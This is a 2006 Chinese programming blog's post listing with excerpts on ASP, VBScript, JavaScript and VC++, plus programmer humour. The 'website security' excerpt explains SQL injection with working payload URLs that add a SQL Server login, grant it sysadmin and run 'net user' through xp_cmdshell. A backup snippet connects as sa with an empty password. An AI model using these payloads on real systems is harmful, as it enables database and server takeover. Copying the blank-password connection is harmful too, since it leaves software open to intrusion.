博文

省市二级联动javascript版(2006-07-20 16:13:00)

摘要:<script language="JavaScript">
<!--
var g_selProvince;
var g_selCity;
var Provinces=new Array(
new Array("110000","北京市"),
new Array("120000","天津市"),
new Array("130000","河北省"),
new Array("140000","山西省"),
new Array("150000","内蒙古自治区"),
new Array("210000","辽宁省"),
new Array("220000","吉林省"),
new Array("230000","黑龙江省"),
new Array("310000","上海市"),
new Array("320000","江苏省"),
new Array("330000","浙江省"),
new Array("340000","安徽省"),
new Array("350000","福建省"),
new Array("360000","江西省"),
new Array("370000","山东省"),
new Array("410000","河南省"),
new Array("420000","湖北省"),
new Array("430000","湖南省"),
new Array("440000","广东省"),
new Array("450000","广西壮族自治区"),
new Array("460000","海南省"),
new Array("500000","重庆市"),
new Array("510000","四川省"),
new Array("520000","贵州省"),
new ......

阅读全文(7610) | 评论:0

省市二级联动菜单vbScript版(2006-07-20 16:10:00)

摘要:<script language=vbScript> 
<!-- 
public x(33) 
x( 0 )="东城,西城,崇文,宣武,朝阳,丰台,石景山,海淀,门头沟,房山,通州,顺义,昌平,大兴,平谷,怀柔,密云,延庆" 
x( 1 )="黄浦,卢湾,徐汇,长宁,静安,普陀,闸北,虹口,杨浦,闵行,宝山,嘉定,浦东,金山,松江,青浦,南汇,奉贤,崇明" 
x( 2 )="和平,东丽,河东,西青,河西,津南,南开,北辰,河北,武清,红挢,塘沽,汉沽,大港,宁河,静海,宝坻,蓟县" 
x( 3 )="万州,涪陵,渝中,大渡口,江北,沙坪坝,九龙坡,南岸,北碚,万盛,双挢,渝北,巴南,黔江,长寿,綦江,潼南,铜梁,大足,荣昌,壁山,梁平,城口,丰都,垫江,武隆,忠县,开县,云阳,奉节,巫山,巫溪,石柱,秀山,酉阳,彭水,江津,合川,永川,南川" 
x( 4 )="石家庄,邯郸,邢台,保定,张家口,承德,廊坊,唐山,秦皇岛,沧州,衡水" 
x( 5 )="太原,大同,阳泉,长治,晋城,朔州,吕梁,忻州,晋中,临汾,运城" 
x( 6 )="呼和浩特,包头,乌海,赤峰,呼伦贝尔盟,阿拉善盟,哲里木盟,兴安盟,乌兰察布盟,锡林郭勒盟,巴彦淖尔盟,伊克昭盟" 
x( 7 )="沈阳,大连,鞍山,抚顺,本溪,丹东,锦州,营口,阜新,辽阳,盘锦,铁岭,朝阳,葫芦岛" 
x( 8 )="长春,吉林,四平,辽源,通化,白山,松原,白城,延边" 
x( 9 )="哈尔滨,齐齐哈尔,牡丹江,佳木斯,大庆,绥化,鹤岗,鸡西,黑河,双鸭山,伊春,七台河,大兴安岭" 
x( 10 )="南京,镇江,苏州,南通,扬州,盐城,徐州,连云港,常州,无锡,宿迁,泰州,淮安" 
x( 11 )="杭州,宁波,温......

阅读全文(4381) | 评论:0

网站安全(2006-07-16 13:33:00)

摘要:程的书上,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对SQL的请求,就留下后患无穷!

这种攻击方法最早源于''or''1''=''1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因该都知道了,那么随之而来的便是;exec

sp_addlogin hax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的SQL Server账号是个管理员,其次请求的提交变

量在整个SQL语句的最后,因为有一些程序员采用SELECT * FROM news WHERE id=... AND topic=... AND .....

这种方法请求数据库,那么如果还用以上的例子就会

news.asp?id=2;exec sp_addlogin hax

变成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ...

整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方法

news.asp?id=2;exec sp_addlogin hax;--

后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!

那么我们连一起来用吧

news.asp?id=2;exec master.dbo.sp_addlogin hax;--

news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--

news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--

news.asp?id=2;exec master.dbo.xp_cmdshell ''net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq......

阅读全文(485) | 评论:0

asp中备份数据库代码(2006-07-16 09:31:00)

摘要:asp在线备份sql server数据库:
1、备份
<%
SQL="backup database 数据库名 to disk='"&Server.MapPath("backup")&"\"&"backuptext.dat"&"'"
set cnn=Server.createobject("adodb.connection")
cnn.open "driver={SQL Server};Server=服务器名;uid=sa;pwd="
cnn.execute SQL
on error resume next
if err<>0 then
   response.write "错误:"&err.Descripting
else
   response.write "数据备份成功!"
end if
%>

2、恢复
<%
SQL="Restore database 数据库名 from disk='"&Server.MapPath("backup")&"\"&"backuptext.dat"&"'"
set cnn=Server.createobject("adodb.connection")
cnn.open "driver={SQL Server};Server=服务器名;uid=sa;pwd="
cnn.execute SQL
on error resume next
if err<>0 then
   response.write "错误:"&err.Descripting
else
 &nbs......

阅读全文(4950) | 评论:0

程序员之歌(2006-07-12 19:41:00)

摘要:
......

阅读全文(6269) | 评论:2

用户登录代码(2006-07-11 18:51:00)

摘要:ASP用户登录代码......

阅读全文(9513) | 评论:2

asp错误提示(2006-07-10 09:06:00)

摘要:MicrosoftVBScript语*错误(0x800A03E9)-->内存不足
MicrosoftVBScript语*错误(0x800A03EA)-->语*错误
MicrosoftVBScript语*错误(0x800A03EB)-->缺少 ':'
MicrosoftVBScript语*错误(0x800A03ED)-->缺少 '('
MicrosoftVBScript语*错误(0x800A03EE)-->缺少 ')'
MicrosoftVBScript语*错误(0x800A03EF)-->缺少 ']'
MicrosoftVBScript语*错误(0x800A03F2)-->缺少标识符
MicrosoftVBScript语*错误(0x800A03F3)-->缺少 '='
MicrosoftVBScript语*错误(0x800A03F4)-->缺少 'If'
MicrosoftVBScript语*错误(0x800A03F5)-->缺少 'To'
MicrosoftVBScript语*错误(0x800A03F6)-->缺少 'End'
MicrosoftVBScript语*错误(0x800A03F7)-->缺少 'Function'
MicrosoftVBScript语*错误(0x800A03F8)-->缺少 'Sub'
MicrosoftVBScript语*错误(0x800A03F9)-->缺少 'Then'
MicrosoftVBScript语*错误(0x800A03FA)-->缺少 'Wend'
MicrosoftVBScript语*错误(0x800A03FB)-->缺少 'Loop'
MicrosoftVBScript语*错误(0x800A03FC)-->缺少 'Next'
MicrosoftVBScript语*错误(0x800A03FD)-->缺少 'Case'
MicrosoftVBScript语*错误(0x800A03FE)-->缺少 'Select'
MicrosoftVBScript语*错误(0x800A03FF)-->缺少......

阅读全文(3723) | 评论:0

程序员的情书(2006-07-08 11:20:00)

摘要:茫茫内存里,你我不曾相见;
寥寥代码中,命运注定良缘.
当编译开始,我们齐手共建
--中国软件的春天!

虽然我们是不同的对象,都有隐私的一面,
但我相信你会找到我的接口,把我的最真给你看!
因为我是你的指针,在茫茫内存的堆栈中,
永远指向你那片天空,不孜不倦!
我愿做你的内联,供你无限次的调用,直到海枯石烂!
我愿做你的引用,和你同进退共生死,一起经受考验!
只是我不愿苦苦地调试你的心情,最终沦为你的友元!
而我更不愿始乱终弃,删不清借你用的空间,
最后一拍两散,搞得内存混乱...

如今我们已被MFC封装--事事变迁!
如今我们已向COM走去--可想当年! ......

阅读全文(4159) | 评论:1

VC++实用技巧(2006-07-05 14:16:00)

摘要:1.检测程序中的括号是否匹配
把光标移动到需要检测的括号(如大括号{}、方括号[]、圆括号()和尖括号<>)前面,键入快捷键“Ctrl+]”。如果括号匹配正确,光标就跳到匹配的括号处,否则光标不移动,并且机箱喇叭还会发出一声警告声。
2.查看一个宏(或变量、函数)的宏定义
把光标移动到你想知道的一个宏上,就比如说最常见的DECLARE_MAP_MESSAGE上按一下F12(或右键菜单中的Go To Defition Of …),如果没有建立Browse files,会出现提示对话框,确定,然后就会跳到定义那些东西的地方。
相当可喜的是,它也可以看到Microsoft定义的系统宏,非常good. 3.格式化一段乱七八糟的源代码
选中那段源代码,按ATL+F8。
4.在编辑状态下发现成员变量或函数不能显示
删除该项目扩展名为.ncb文件,重新打开该项目。
5.如何整理ClassView视图中大量的类
可以在classview 视图中右键新建文件夹(new folder),再把具有相近性质的类拖到对应的文件夹中,使整个视图看上去清晰明了.
6.定位预处理指定
在源文件中定位光标到对称的#if, #endif,使用Ctrl+K.
7.如何添加系统中Lib到当前项目
在Project | Settings | Link | Object/library modules:输入Lib名称,不同的Lib之间用空格格开.
8.如何添加系统中的头文件(.h)到当前项目.
#include <FileName.h>,告诉编译到VC系统目录去找;使用#include "FileName.h",告诉编译在当前目录找.
9.如何在Studio使用汇编调试
在WorkBench的Debugger状态下按CTRL+F7.
10.怎样处理ClassZiard找不到的系统消息
如果要在ClassWizard中处理WM_NCHITTEST等系统消息,请在ClassWizard中Class Info页中将Message filter改为Window就有了.
11.如何干净的删除一个类
先从Workspace中......

阅读全文(4610) | 评论:0

asp常用代码(2006-07-04 13:43:00)

摘要:1.如何用Asp判断你的网站的虚拟物理路径 
  答:使用Mappath方法 
  < p align="center" >< font size="4" face="Arial" >< b > 
  The Physical path to this virtual website is: 
  < /b >< /font > 
  < font color="#FF0000" size="6" face="Arial" > 
  < %= Server.MapPath("\")% > 
  < /font >< /p > 
  2.我如何知道使用者所用的浏览器? 
  答:使用the Request object方法 
  strBrowser=Request.ServerVariables("HTTP_USER_AGENT") 
  If Instr(strBrowser,"MSIE") < > 0 Then 
    Response.redirect("ForMSIEOnly.htm") 
  Else 
    Response.redirect("ForAll.htm") 
  End If  3.如何计算每天的平均反复访问人数 
  答:解决方法 
  < % startdate=DateDiff("d",Now,"01/01/1990") 
  if strdate< 0 then startdate=startdate*-1 
  avgvpd=Int((usercnt)/startdate) % > 
  显示结果 
  < % response.write(avgvpd) % > 
  tha......

阅读全文(3996) | 评论:0